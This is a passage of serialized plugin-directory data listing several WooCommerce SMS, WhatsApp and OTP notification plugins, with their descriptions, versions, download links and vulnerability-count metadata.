new user registration. Registration using a phone number only is supported.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fotp-verification-woocommerce-checkout-form\u002F\" rel=\"nofollow ugc\">WooCommerce checkout form\u003C\u002Fa> OTP verification when the user places an order on the WooCommerce site.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fotp-verification-for-woocommerce-frontend-manager-form\" rel=\"nofollow ugc\">WooCommerce Frontend Manager form\u003C\u002Fa> OTP verification on the Multivendor form for Bookings and listing of WooCommerce frontend Manager.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fotp-verification-for-woocommerce-social-login\" rel=\"nofollow ugc\">WooCommerce Social Login form\u003C\u002Fa> Enable OTP verification on the Social Login for seamless checkout and account creation with a layer of security.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fotp-verification-for-woocommerce-product-vendor-registration-form\" rel=\"nofollow ugc\">WooCommerce Product Vendor Registration Form\u003C\u002Fa> OTP verification on the vendor registration forms on the WooCommerce store manager page.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fotp-verification-woocommerce-billing-address-update-form\u002F\" rel=\"nofollow ugc\">WooCommerce Billing Address Form\u003C\u002Fa> Enabled OTP verification when users changes the billing address.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fcheckout-wc-form-setup-for-wordpress-otp\" rel=\"nofollow ugc\">Checkout WC Form\u003C\u002Fa>: Enables OTP verification when users proceed with the checkout on the Checkout WC form.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwoocommerce-account-detail-form-setup-otp-wordpress\" rel=\"nofollow ugc\">WooCommerce Account Details Form\u003C\u002Fa>: Enables OTP verification when a user changes the phone number or email address on the account page.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fhow-to-configure-wordpress-password-reset-addon\" rel=\"nofollow ugc\">WooCommerce Password Reset Form\u003C\u002Fa>: OTP verification when user reset their password using WooCommerce password reset page.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fdokan-notification-vendor-notification-otp-verification-plugin\" rel=\"nofollow ugc\">Dokan\u003C\u002Fa> – Best WooCommerce Multivendor Marketplace: OTP Verification on Dokan Vendor Registration form. (For customers & vendors)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fblockquote>\n\u003Ch3>WOOCOMMERCE ADDITIONAL FEATURE LIST\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Flogin-with-whatsapp-as-two-factor\" rel=\"nofollow ugc\">WhatsApp Order Notifications & WhatsApp OTP Verification\u003C\u002Fa> :\u003C\u002Fstrong>\u003Cbr \u002F>\nSend OTPs and order notifications directly over WhatsApp using your own personal WhatsApp Business account, ensuring faster delivery and a more personalized customer experience.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fhow-to-configure-register-using-only-phone-addon\" rel=\"nofollow ugc\">Register using Phone Number only\u003C\u002Fa> :\u003C\u002Fstrong>\u003Cbr \u002F>\nEnable users to register on your WooCommerce site using only their phone number, eliminating the need for an email address and simplifying the registration process.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwcfm-notification-vendor-notification-otp-verification-plugin\" rel=\"nofollow ugc\">WCFM Multivendor Notifications\u003C\u002Fa> :\u003C\u002Fstrong>\u003Cbr \u002F>\nSend real-time order status update notifications to store vendors via SMS, keeping them informed about new orders, cancellations, and status changes to ensure timely processing.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fdokan-notification-vendor-notification-otp-verification-plugin\" rel=\"nofollow ugc\">Dokan Vendor Notifications\u003C\u002Fa> :\u003C\u002Fstrong>\u003Cbr \u002F>\nSend SMS notifications to vendors whenever there’s a WooCommerce order status update, ensuring they stay informed about new orders, cancellations, and progress in real-time.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fotp-verification-for-selected-countries\" rel=\"nofollow ugc\">OTP Verification on Selected WooCommerce Product Category\u003C\u002Fa> :\u003C\u002Fstrong>\u003Cbr \u002F>\nEnable OTP verification specifically for selected WooCommerce product categories, adding an extra layer of security for high-risk or premium products during checkout or user actions.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fhow-to-configure-limit-otp-request-addon\" rel=\"nofollow ugc\">Limit OTP Request\u003C\u002Fa> :\u003C\u002Fstrong>\u003Cbr \u002F>\nLimit OTP Request helps prevent misuse by restricting the number of OTP requests a user can make within a specific time frame, protecting against spam and malicious attempts.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Login with Phone Number :\u003C\u002Fstrong>\u003Cbr \u002F>\nAllow users to log in to your WooCommerce site using only their phone number, eliminating the need for a username or email and streamlining the login experience.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fhow-to-configure-woocommerce-password-reset-addon\" rel=\"nofollow ugc\">WooCommerce Password Reset Over OTP\u003C\u002Fa> :\u003C\u002Fstrong>\u003Cbr \u002F>\nAllow users to reset their password securely by verifying their identity through an OTP sent to their registered phone number or email address.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>How does this plugin work?\u003C\u002Fh4>\n\u003Col>\n\u003Cli>Once the order is placed on the WooCommerce website the customer and admin will receive the SMS notifications of order status updates.\u003C\u002Fli>\n\u003Cli>SMS Notification will be sent automatically once order status changes.\u003C\u002Fli>\n\u003Cli>Users will need to verify their Phone Number\u002FEmail address before submitting the form.\u003C\u002Fli>\n\u003Cli>Once OTP is verified, the user can submit the form.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>=Why Choose miniOrange? =\u003Cbr \u002F>\n1. Send SMS Notifications to the customers, admins, and vendors for order status updates and much more!\u003Cbr \u002F>\n2. Verification of the user’s Phone Number or Email address during registration and login is a must these days. You can easily enable OTP verification on your login registration form using a plugin.\u003Cbr \u002F>\n3. WhatsApp order notifications and OTP Verification.\u003Cbr \u002F>\n4. WooCommerce SMS Order Status Notifications.\u003Cbr \u002F>\n5. Easy setup: \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwoocommerce-order-notifications-plugin-setup-wordpress\" rel=\"nofollow ugc\">Guide\u003C\u002Fa>\u003Cbr \u002F>\n6. 24*7 Support.\u003C\u002Fp>\n\u003Ch3>SUPPORT\u003C\u002Fh3>\n\u003Cp>24*7 customer support is available.\u003Cbr \u002F>\nFor new feature requests or any queries, you can use WordPress \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fminiorange-sms-order-notification-otp-verification\u002F\" rel=\"ugc\">support forum\u003C\u002Fa>.\u003Cbr \u002F>\nEmail us at \u003Cstrong>otpsupport@xecurify.com\u002Finfo@xecurify.com\u003C\u002Fstrong>.\u003C\u002Fp>\n","OTP Verification via SMS, Email,or WhatsApp, and SMS Order Notifications, Vendor Notifications for WooCommerce.OTP Login and registration with Phone →",9346,100,6,"2026-03-20T07:15:00.000Z","6.9.5","3.5","5.3.0",[20,124,125,126,127],"otp-verification","phone-verification","sms-order-notifications","woocommerce-notifications","http:\u002F\u002Fminiorange.com\u002Fminiorange-woocommerce-otp-plugin","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fminiorange-sms-order-notification-otp-verification.4.4.0.zip",99,"2026-01-09 00:00:00",{"slug":133,"name":134,"version":135,"author":136,"author_profile":137,"description":138,"short_description":139,"active_installs":140,"downloaded":141,"rating":13,"num_ratings":13,"last_updated":142,"tested_up_to":143,"requires_at_least":144,"requires_php":145,"tags":146,"homepage":149,"download_link":150,"security_score":117,"vuln_count":13,"unpatched_count":13,"last_vuln_date":37,"fetched_at":151},"bulksmsplans-sms-notifications","BULK SMS PLANS SMS Notifications","1.3.0","Prince Malik","https:\u002F\u002Fprofiles.wordpress.org\u002Fprincemm009\u002F","\u003Cp>This plugin allows you to send custom SMS messages and WhatsApp notifications for various WooCommerce order statuses, including New Order, Pending Order, Processing Order, On Hold Order, Completed Order, Cancelled Order, Failed Order, Refunded Order, and Checkout OTP. It also maintains a history of sent SMS messages for easy tracking.\u003C\u002Fp>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Cp>– Custom SMS sending for WooCommerce orders.\u003Cbr \u002F>\n– WhatsApp notifications for different order statuses.\u003Cbr \u002F>\n– SMS history logging.\u003Cbr \u002F>\n– OTP verification during checkout.\u003Cbr \u002F>\n– Easy configuration and integration with WooCommerce.\u003C\u002Fp>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>This plugin is licensed under the GPLv2 or later.\u003C\u002Fp>\n","Send custom SMS and WhatsApp notifications for WooCommerce orders, with tracking of sent messages.",10,1195,"2026-01-05T07:53:00.000Z","6.6.5","5.0","7.2",[147,148,21,22,23],"custom-notifications","order-notifications","https:\u002F\u002Fbulksmsplans.com\u002Fassets\u002Fplugin\u002Fbulksmsplans-sms-notification-v3.zip","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbulksmsplans-sms-notifications.1.3.0.zip","2026-04-16T10:56:18.058Z",{"slug":153,"name":154,"version":155,"author":156,"author_profile":157,"description":158,"short_description":159,"active_installs":140,"downloaded":160,"rating":13,"num_ratings":13,"last_updated":161,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":162,"homepage":164,"download_link":165,"security_score":117,"vuln_count":13,"unpatched_count":13,"last_vuln_date":37,"fetched_at":29},"mk4web-notifier","mk4web Notifier for WooCommerce","1.2.1","mk4web","https:\u002F\u002Fprofiles.wordpress.org\u002Fmk4web\u002F","\u003Cp>\u003Cstrong>Send WhatsApp messages directly from your WordPress store — no Meta API, no per-message fees, no complicated setup.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwanoti.net\u002F\" rel=\"nofollow ugc\">WaNoti\u003C\u002Fa> connects your WordPress site to WhatsApp using your own number. Scan a QR code once, and your store sends messages automatically.\u003C\u002Fp>\n\u003Ch4>Why merchants love it\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>✅ \u003Cstrong>No Meta\u002FWhatsApp Business API required\u003C\u002Fstrong> — connect any regular WhatsApp number\u003C\u002Fli>\n\u003Cli>✅ \u003Cstrong>No per-message fees\u003C\u002Fstrong> — flat monthly plan, send unlimited messages\u003C\u002Fli>\n\u003Cli>✅ \u003Cstrong>Arabic & English\u003C\u002Fstrong> — full RTL support and bilingual message templates\u003C\u002Fli>\n\u003Cli>✅ \u003Cstrong>WooCommerce + any site\u003C\u002Fstrong> — order alerts work with WooCommerce; OTP and chat widget work everywhere\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>What it does\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>WooCommerce Order Notifications\u003C\u002Fstrong>\u003Cbr \u002F>\nAutomatically send WhatsApp messages to customers when their order is placed, confirmed, shipped, delivered, cancelled, or refunded. Fully customizable message templates with order details, items, totals, and tracking numbers.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>WhatsApp OTP Verification\u003C\u002Fstrong>\u003Cbr \u002F>\nReplace SMS verification with instant WhatsApp OTP codes at checkout and login. Reduce fraud and improve conversion — customers already have WhatsApp open.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Abandoned Cart Recovery\u003C\u002Fstrong>\u003Cbr \u002F>\nAutomatically message customers who added products to their cart but didn’t complete the purchase. Send a reminder after 1 hour and another after 24 hours with a direct cart recovery link.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Back in Stock Alerts\u003C\u002Fstrong>\u003Cbr \u002F>\nLet customers subscribe via WhatsApp when a product is out of stock. Automatically notify them the moment it’s available again — no email needed.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Review Request Automation\u003C\u002Fstrong>\u003Cbr \u002F>\nTwo days after an order is marked delivered, send a WhatsApp message asking for a review. Include a direct link to your Google, Facebook, or WooCommerce reviews page.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>WhatsApp Chat Widget\u003C\u002Fstrong>\u003Cbr \u002F>\nAdd a floating WhatsApp button to your store so customers can message you in one tap. Works on all pages, customizable position, message, and greeting.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Contact Form Alerts\u003C\u002Fstrong>\u003Cbr \u002F>\nGet an instant WhatsApp notification on your phone when a customer submits a Contact Form 7 or WPForms form — never miss a lead.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Store Owner Admin Alerts\u003C\u002Fstrong>\u003Cbr \u002F>\nReceive WhatsApp alerts on new orders, payments, and form submissions directly on your phone. No need to refresh your inbox.\u003C\u002Fp>\n\u003Ch4>How it works\u003C\u002Fh4>\n\u003Col>\n\u003Cli>Create a free account at \u003Ca href=\"https:\u002F\u002Fwanoti.net\u002Fregister\" rel=\"nofollow ugc\">wanoti.net\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Connect your WhatsApp number by scanning a QR code (one minute)\u003C\u002Fli>\n\u003Cli>Enter your API key in \u003Cstrong>WaNoti \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Settings\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Enable the notifications you want — done\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>No Meta developer account. No WhatsApp Business API approval. No technical setup.\u003C\u002Fp>\n\u003Ch4>External service required\u003C\u002Fh4>\n\u003Cp>This plugin sends messages via the \u003Ca href=\"https:\u002F\u002Fwanoti.net\u002F\" rel=\"nofollow ugc\">WaNoti\u003C\u002Fa> messaging service. You must:\u003C\u002Fp>\n\u003Col>\n\u003Cli>Create a free account at \u003Ca href=\"https:\u002F\u002Fwanoti.net\u002F\" rel=\"nofollow ugc\">wanoti.net\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Connect your WhatsApp number in the WaNoti dashboard (QR scan)\u003C\u002Fli>\n\u003Cli>Copy your API key into \u003Cstrong>WaNoti \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Settings\u003C\u002Fstrong> in WordPress\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>Without an API key the plugin only shows setup screens and does not transmit any data.\u003C\u002Fp>\n\u003Ch4>What data is sent to WaNoti\u003C\u002Fh4>\n\u003Cp>When configured, the plugin may send the following to \u003Ccode>wanoti.net\u003C\u002Fcode> servers:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Your site URL, WordPress version, and plugin version (hourly heartbeat)\u003C\u002Fli>\n\u003Cli>API key (stored in your database, sent as \u003Ccode>X-Api-Key\u003C\u002Fcode> header)\u003C\u002Fli>\n\u003Cli>Order notifications: order ID, status, customer name, phone, email, totals, and line items\u003C\u002Fli>\n\u003Cli>Admin alert phone numbers and message content from your templates\u003C\u002Fli>\n\u003Cli>OTP verification phone numbers when checkout\u002Flogin OTP is enabled\u003C\u002Fli>\n\u003Cli>Contact form fields (name, phone, email, message) when admin contact notifications are enabled\u003C\u002Fli>\n\u003Cli>Abandoned cart: customer name and phone when a cart is flagged for recovery\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>See \u003Ca href=\"https:\u002F\u002Fwanoti.net\u002Fprivacy\" rel=\"nofollow ugc\">WaNoti Privacy Policy\u003C\u002Fa> and \u003Ca href=\"https:\u002F\u002Fwanoti.net\u002Fterms\" rel=\"nofollow ugc\">Terms of Service\u003C\u002Fa>. The plugin adds suggested privacy policy text under \u003Cstrong>Settings \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Privacy\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Ch4>WhatsApp trademark\u003C\u002Fh4>\n\u003Cp>WhatsApp is a trademark of WhatsApp LLC. This plugin is not affiliated with or endorsed by WhatsApp or Meta Platforms.\u003C\u002Fp>\n","WhatsApp notifications for WooCommerce orders, OTP, abandoned cart, chat widget. No Meta API or per-message fees.",233,"2026-06-28T02:14:00.000Z",[19,20,22,163,23],"whatsapp-chat","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwanoti\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmk4web-notifier.1.2.1.zip",{"slug":167,"name":168,"version":169,"author":170,"author_profile":171,"description":172,"short_description":173,"active_installs":140,"downloaded":174,"rating":117,"num_ratings":78,"last_updated":175,"tested_up_to":176,"requires_at_least":177,"requires_php":17,"tags":178,"homepage":180,"download_link":181,"security_score":117,"vuln_count":13,"unpatched_count":13,"last_vuln_date":37,"fetched_at":29},"sms8-io","SMS8 – SMS Gateway for WooCommerce, Order Notifications, OTP Login & 2FA via Android","4.1.4","SMS8.io","https:\u002F\u002Fprofiles.wordpress.org\u002Fsms8io\u002F","\u003Cp>\u003Cstrong>SMS8 turns your Android phone into a free SMS gateway for WordPress and WooCommerce.\u003C\u002Fstrong> Send WooCommerce order SMS notifications, OTP login codes, two-factor authentication messages and bulk SMS straight from your own SIM card — no Twilio, no Vonage, no Plivo, no per-message fees, no US A2P 10DLC paperwork. Pair an Android device with your SMS8 account, paste your API key into the plugin, and your WordPress site starts texting customers in minutes.\u003C\u002Fp>\n\u003Cp>Built for WooCommerce stores tired of getting nickel-and-dimed by CPaaS providers, OTP-driven membership sites that don’t want to pay per verification, and any WordPress install that just wants reliable SMS without subscribing to a third gateway. Full project home and documentation at \u003Ca href=\"https:\u002F\u002Fsms8.io\" rel=\"nofollow ugc\">sms8.io\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>SMS gateway for WordPress\u003C\u002Fstrong> — send through your real mobile number with no per-SMS fees. SMS8 starts at $29\u002Fmonth for unlimited messages through one device.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>WooCommerce SMS notifications\u003C\u002Fstrong> for every order status — Pending, Processing, On hold, Completed, Cancelled, Refunded, Failed — each with its own toggle and message template. Placeholders for customer name, order ID, total, tracking number, payment method and more.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Admin order SMS alerts\u003C\u002Fstrong> — text the store owner whenever a new order lands, with a separate template.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>OTP login shortcode\u003C\u002Fstrong> — drop \u003Ccode>[sms8_otp]\u003C\u002Fcode> on any page to render a two-step phone verification form. Works with membership plugins, custom registration flows, account-recovery pages.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Two-factor authentication (2FA) helper\u003C\u002Fstrong> — \u003Ccode>SMS8_API::send_otp()\u003C\u002Fcode> and \u003Ccode>verify_otp()\u003C\u002Fcode> for your own login hooks, including BuddyPress, WP Members, and custom theme registration.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Bulk SMS from custom code\u003C\u002Fstrong> — \u003Ccode>do_action('sms8_send_sms', '+14155550101', 'Hi')\u003C\u002Fcode> from any theme, MU-plugin or cron job.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Device & SIM picker\u003C\u002Fstrong> — pull the list of your paired Android phones with one click and pin a specific device or SIM slot for sends.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Setup wizard\u003C\u002Fstrong> — 3-step onboarding on activation: Connect, pick device, send a test SMS.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>One-click Connect\u003C\u002Fstrong> — popup OAuth-style flow grabs your API key from SMS8 automatically. No copy-paste.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Send log\u003C\u002Fstrong> — last 100 attempts with status, error, source, and timestamp. Auto-pruned per retention setting.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>HPOS-compatible\u003C\u002Fstrong> — full support for WooCommerce High-Performance Order Storage.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Translations included\u003C\u002Fstrong> — English, French, Spanish, Arabic (RTL).\u003C\u002Fli>\n\u003Cli>\u003Cstrong>No tracking, no analytics, no phone home.\u003C\u002Fstrong> GPLv2. The plugin only talks to the SMS8 API endpoint you configured.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Why pick SMS8 over Twilio \u002F Vonage \u002F Plivo?\u003C\u002Fh4>\n\u003Cp>Twilio, Vonage, MessageBird and Plivo charge $0.0075 to $0.04 per SMS in the US, require A2P 10DLC registration paperwork, and route your messages as third-party A2P traffic. Recipients see a short code or random number they don’t recognise — and reply rates collapse.\u003C\u002Fp>\n\u003Cp>SMS8 routes through a real Android phone you own. The message arrives from your real local number. Recipients reply directly to you, not to a 5-digit short code that disappears next quarter. And it costs $29\u002Fmonth flat for unlimited SMS, not $300\u002Fmonth at any meaningful volume. Full pricing and pricing calculator on \u003Ca href=\"https:\u002F\u002Fsms8.io\" rel=\"nofollow ugc\">sms8.io\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>How does it work?\u003C\u002Fh4>\n\u003Col>\n\u003Cli>Install the free SMS8 Android app from \u003Ca href=\"https:\u002F\u002Fsms8.io\u002Fsms-gateway-apk-android\" rel=\"nofollow ugc\">sms8.io\u002Fsms-gateway-apk-android\u003C\u002Fa>, sign in with your SMS8 account, scan the QR on app.sms8.io\u002Fdevices.php to pair the phone.\u003C\u002Fli>\n\u003Cli>Install this WordPress plugin, click \u003Cstrong>Connect with SMS8\u003C\u002Fstrong> in the setup wizard — a popup signs you in and auto-fills your API key.\u003C\u002Fli>\n\u003Cli>Configure WooCommerce templates per order status, or just turn on Processing + Completed defaults and you’re done.\u003C\u002Fli>\n\u003Cli>When a WooCommerce order triggers a status change, the plugin POSTs to app.sms8.io with \u003Ccode>Authorization: Bearer \u003Capi_key>\u003C\u002Fcode>, SMS8 queues the message, your paired Android polls SMS8, sends the SMS, and reports back.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>The whole round-trip is typically under 4 seconds. Plugin requests use a 10-second timeout — checkout will never block longer than that even if the SMS8 API is slow.\u003C\u002Fp>\n\u003Ch4>WooCommerce SMS notification templates\u003C\u002Fh4>\n\u003Cp>Every WooCommerce order status has its own message template with these placeholders:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ccode>{first_name}\u003C\u002Fcode> \u003Ccode>{last_name}\u003C\u002Fcode> \u003Ccode>{full_name}\u003C\u002Fcode> \u003Ccode>{customer_name}\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>{order_id}\u003C\u002Fcode> \u003Ccode>{order_total}\u003C\u002Fcode> \u003Ccode>{order_currency}\u003C\u002Fcode> \u003Ccode>{order_status}\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>{tracking_number}\u003C\u002Fcode> (works with most shipment-tracking plugins)\u003C\u002Fli>\n\u003Cli>\u003Ccode>{site_name}\u003C\u002Fcode> \u003Ccode>{site_url}\u003C\u002Fcode> \u003Ccode>{payment_method}\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Send SMS from your own code\u003C\u002Fh4>\n\u003Cp>Use the \u003Ccode>sms8_send_sms\u003C\u002Fcode> action from any plugin or theme. Example: send the admin an SMS when a new user registers.\u003C\u002Fp>\n\u003Cpre>\u003Ccode>add_action('user_register', function ($user_id) {\n    $user = get_userdata($user_id);\n    do_action('sms8_send_sms', get_option('admin_phone'), \"New signup: {$user->user_email}\");\n});\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Ch4>OTP login and 2FA shortcode\u003C\u002Fh4>\n\u003Cp>The \u003Ccode>[sms8_otp]\u003C\u002Fcode> shortcode renders a self-contained two-step form: phone field, “Send code” button, code field, “Verify” button. On successful verification it fires \u003Ccode>do_action('sms8_phone_verified', $phone)\u003C\u002Fcode> so any membership plugin or theme can mark the phone verified. Optional \u003Ccode>redirect=\"\u002Fmy-account\"\u003C\u002Fcode> attribute sends the user somewhere after verification.\u003C\u002Fp>\n\u003Ch4>Legal and compliance\u003C\u002Fh4>\n\u003Cp>The plugin sends SMS through your real mobile number via P2P (person-to-person) messaging. In the US this is \u003Cstrong>exempt from A2P 10DLC registration requirements\u003C\u002Fstrong> that apply to bulk SMS providers. You still need to comply with TCPA: get explicit opt-in from recipients for marketing messages, honor STOP keywords, and never send between 9pm and 8am local time. Outside the US, check your local regulator’s text-marketing rules.\u003C\u002Fp>\n\u003Ch4>About SMS8\u003C\u002Fh4>\n\u003Cp>SMS8 is an Android-phone-based SMS gateway service running since 2024, used by hundreds of e-commerce stores, agencies and SaaS apps to send SMS without CPaaS fees. Marketing site, blog and pricing at \u003Ca href=\"https:\u002F\u002Fsms8.io\" rel=\"nofollow ugc\">sms8.io\u003C\u002Fa>. REST API documentation at \u003Ca href=\"https:\u002F\u002Fsms8.io\u002Fsms-api-documentation\" rel=\"nofollow ugc\">sms8.io\u002Fsms-api-documentation\u003C\u002Fa>. Get the Android gateway app at \u003Ca href=\"https:\u002F\u002Fsms8.io\u002Fsms-gateway-apk-android\" rel=\"nofollow ugc\">sms8.io\u002Fsms-gateway-apk-android\u003C\u002Fa>.\u003C\u002Fp>\n","SMS gateway for WordPress & WooCommerce. Order notifications, OTP login, 2FA, bulk SMS through your own Android phone. No Twilio. No per-SMS fees.",2481,"2026-05-29T20:28:00.000Z","6.8.6","5.8",[20,21,179,101,23],"sms-gateway","https:\u002F\u002Fsms8.io\u002Fsend-sms-from-wordpress-using-own-phone","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsms8-io.4.1.4.zip",{"error":183,"url":184,"statusCode":185,"statusMessage":186,"message":186},true,"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fautomation-web-platform\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":78,"versions":188},[189],{"version":6,"download_url":25,"svn_tag_url":190,"released_at":37,"has_diff":50,"diff_files_changed":191,"diff_lines":37,"trac_diff_url":37,"vulnerabilities":192,"is_current":183},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fautomation-web-platform\u002Ftags\u002F4.8.6\u002F",[],[]]